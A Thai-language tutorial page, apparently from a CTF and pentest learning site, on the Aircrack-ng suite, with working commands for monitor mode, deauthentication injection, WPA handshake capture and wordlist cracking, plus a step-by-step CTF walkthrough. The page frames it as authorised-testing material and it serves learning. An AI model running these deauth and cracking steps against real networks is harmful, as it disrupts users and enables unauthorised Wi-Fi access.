wireless
Aircrack-ng Suite
Aircrack-ng เป็นชุดเครื่องมือมาตรฐานสำหรับ wireless security testing — ครอบคลุมตั้งแต่เปิด monitor mode, สแกน, จับ packet, inject (deauth), ไปจนถึง crack บทนี้อธิบายแต่ละเครื่องมือในชุดและ workflow รวม (เนื้อหาเพื่อทดสอบเครือข่ายที่ได้รับอนุญาต)
Intermediate#aircrack-ng#wireless#airodump#aireplay#airmon#suite#ctf
1. เครื่องมือในชุด
| เครื่องมือ | หน้าที่ |
|---|---|
| airmon-ng | เปิด/ปิด monitor mode บน wireless adapter |
| airodump-ng | สแกน + จับ packet (handshake) |
| aireplay-ng | inject packet — deauth, fake auth, replay |
| aircrack-ng | crack WEP/WPA จาก capture |
| airdecap-ng | ถอดรหัส capture เมื่อรู้ key |
| airbase-ng | สร้าง rogue/fake AP |
2. Monitor mode (airmon-ng)
เปิด monitor modeLinux
# ดู adapter
sudo airmon-ng
# ปิด process ที่รบกวน (NetworkManager ฯลฯ)
sudo airmon-ng check kill
# เปิด monitor mode → ได้ interface ใหม่ (เช่น wlan0mon)
sudo airmon-ng start wlan0
# ปิดเมื่อเสร็จ
sudo airmon-ng stop wlan0monต้องใช้ adapter ที่รองรับ monitor mode + packet injection (เช่น chipset Atheros/Ralink บางรุ่น)
3. สแกนและจับ (airodump-ng)
airodump-ngLinux
# สแกนทุก AP รอบตัว (ดู BSSID, channel, encryption, client)
sudo airodump-ng wlan0mon
# จับเฉพาะ AP เป้าหมาย (ระบุ channel + BSSID + เขียนไฟล์)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# มุมขวาบนจะขึ้น "WPA handshake: ..." เมื่อจับได้
# คอลัมน์สำคัญ: BSSID (MAC ของ AP), PWR (สัญญาณ),
# CH (channel), ENC (WPA2/WPA3), STATION (client ที่เชื่อม)4. Inject (aireplay-ng)
deauth และ test injectionLinux
# ทดสอบว่า adapter inject ได้ไหม
sudo aireplay-ng --test wlan0mon
# deauth — เตะ client เพื่อบังคับ reconnect (เกิด handshake)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# เตะ client เฉพาะตัว
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# deauth 0 = ส่งต่อเนื่อง (ใช้ระวัง)deauth จำนวนน้อย (5) พอให้ client reconnect; ส่งเฉพาะ client เป้าหมายแม่นกว่า broadcast
5. Crack (aircrack-ng)
crack จาก captureLinux
# WPA/WPA2 ด้วย wordlist
aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# ตรวจว่าไฟล์มี handshake ไหม
aircrack-ng capture-01.cap
# (สำหรับ GPU/เร็วกว่า ใช้ hashcat — ดูหัวข้อ WPA2 และ Hashcat Workflow)aircrack-ng ใช้ CPU; งานใหญ่แปลงเป็น hashcat mode 22000 เพื่อใช้ GPU
6. Quick Reference
- ชุด: airmon (monitor), airodump (จับ), aireplay (inject), aircrack (crack)
- monitor: airmon-ng check kill; airmon-ng start wlan0
- สแกน/จับ: airodump-ng -c CH --bssid BSSID -w cap wlan0mon
- deauth: aireplay-ng --deauth 5 -a BSSID wlan0mon
- crack: aircrack-ng -w wordlist -b BSSID cap-01.cap
- ต้องมี adapter รองรับ monitor+injection; ใช้ตามกฎหมาย
🧭 จับมือทำทีละขั้น (มีแค่ Kali) + ถ้าติดไปไหนต่อ
สมมติเพิ่งเจอโจทย์ CTF ที่ต้อง crack Wi-Fi ของเป้าหมาย มีแค่เครื่อง Kali เปล่าๆ กับ USB wireless adapter — ทำตามนี้ทีละขั้น ใช้แค่ชุด aircrack-ng ก็ครบ workflow ตั้งแต่เปิด monitor mode จนได้ passphrase
- 1เช็ค adapter: พิมพ์
iwconfigดู interface ไร้สาย แล้วsudo airmon-ngดูว่า chipset รองรับ monitor mode — ควรเห็นชื่อ adapter ในลิสต์ - 2ปิด process ที่รบกวน:
sudo airmon-ng check kill— ปิด NetworkManager/wpa_supplicant ที่แย่ง interface - 3เปิด monitor mode:
sudo airmon-ng start wlan0— ควรเห็น interface ใหม่ เช่นwlan0mon - 4สแกนหาเป้าหมาย:
sudo airodump-ng wlan0mon— จดค่า BSSID, CH (channel), ENC ของ AP เป้าหมายที่โจทย์ให้ (SSID) - 5จับเฉพาะเป้าหมาย (Ctrl+C ออกจากสแกนก่อน):
sudo airodump-ng -c <CH> --bssid <BSSID> -w cap wlan0mon— ปล่อยรันทิ้งไว้ - 6เปิด terminal ใหม่ยิง deauth:
sudo aireplay-ng --deauth 5 -a <BSSID> wlan0mon— เตะ client ให้หลุดแล้วต่อใหม่ - 7กลับไปดู terminal airodump มุมขวาบน — ควรขึ้นข้อความ
WPA handshake: <BSSID>แปลว่าจับสำเร็จ - 8ตรวจว่า handshake ครบ:
aircrack-ng cap-01.cap— ต้องเห็น AP เป้าหมายมีคำว่า (handshake) กำกับ - 9crack ด้วย wordlist มาตรฐาน:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> cap-01.cap - 10ถ้าไม่เจอในรอบแรก อย่าเพิ่งถอดใจ — ไปดู decision tree ด้านล่างว่าควร pivot ไปทางไหนต่อ
เจอโจทย์ Wi-Fi — ตัดสินใจทีละขั้น
เช็ค wireless adapter รองรับ monitor+injection ไหม
sudo airmon-ng
✅ รองรับ→→ เปิด monitor mode ต่อ
❌ ไม่รองรับ→→ หา adapter ภายนอก (Alfa/Atheros/Ralink) ที่รองรับ injection
เปิด monitor mode + สแกนหาเป้าหมาย
airmon-ng start wlan0; airodump-ng wlan0mon
ดูคอลัมน์ ENC/AUTH ของ AP เป้าหมาย
เป็น WPA3 (SAE)→→ ไปดูวิธีจัดการ WPA3 ก่อน (ไม่ใช่ handshake ปกติ)
เป็น WPA2/WPA→→ จับ handshake แบบคลาสสิก
จับ handshake ด้วย deauth
aireplay-ng --deauth 5 -a BSSID wlan0mon
✅ เห็น 'WPA handshake:' มุมขวาบน→→ verify handshake
❌ ไม่เห็นหลัง deauth หลายรอบ (ไม่มี client)→→ ลอง PMKID (ไม่ต้องมี client)
| ขั้นตอน/งาน | เครื่องมือใน Kali | ติดตั้งเพิ่ม (ถ้าไม่มี) | เครื่องมือออนไลน์ |
|---|---|---|---|
| เปิด monitor mode | airmon-ng | - | - |
| สแกน/จับ handshake | airodump-ng | - | - |
| deauth / inject | aireplay-ng | - | - |
| จับ PMKID (clientless) | - | apt install hcxtools hcxdumptool | - |
| ตรวจ/แปลง capture | aircrack-ng, wireshark | - | cyberchef.org (แกะ hex ของ frame) |
| crack ด้วย wordlist | aircrack-ng | - | weakpass.com (wordlist ใหญ่) |
| crack เร็วด้วย GPU | - | apt install hashcat | hashcat.net/wiki (mode 22000) |
| เทียบ hash กับฐานข้อมูลสาธารณะ | - | - | wpa-sec.stanev.org (upload handshake) |
🚑 ถ้าตันสนิท ลองท่าถัดไป: Handshake Analysis — ถ้าไม่แน่ใจว่า capture ครบไหม/มี noise ปน; Hashcat Workflow — ถ้า wordlist ธรรมดา crack ไม่ผ่านและต้องการ mask/rule บน GPU; WPA2 — ถ้าไม่มี client เลยและอยากรู้ทาง PMKID เชิงลึก; WPA3 — ถ้า ENC ขึ้น SAE/WPA3 (ไม่ใช่ WPA2 handshake ปกติ)
หัวข้อที่เชื่อมโยง
Hashcat Workflow (WPA)อยู่ใน workflowHandshake Analysisอยู่ใน workflowWPA2อยู่ใน workflowWPA3อยู่ใน workflowBLE AttacksเทคนิคเดียวกันPass-the-HashเทคนิคเดียวกันCredential Dumping (LSASS)เทคนิคเดียวกันKerberoastingเทคนิคเดียวกันAS-REP RoastingเทคนิคเดียวกันDCSyncเทคนิคเดียวกันHashcat PlaybookเทคนิคเดียวกันJohn The Ripper Playbookเทคนิคเดียวกัน
โน้ตของฉัน
ยังไม่มีโน้ตสำหรับหัวข้อนี้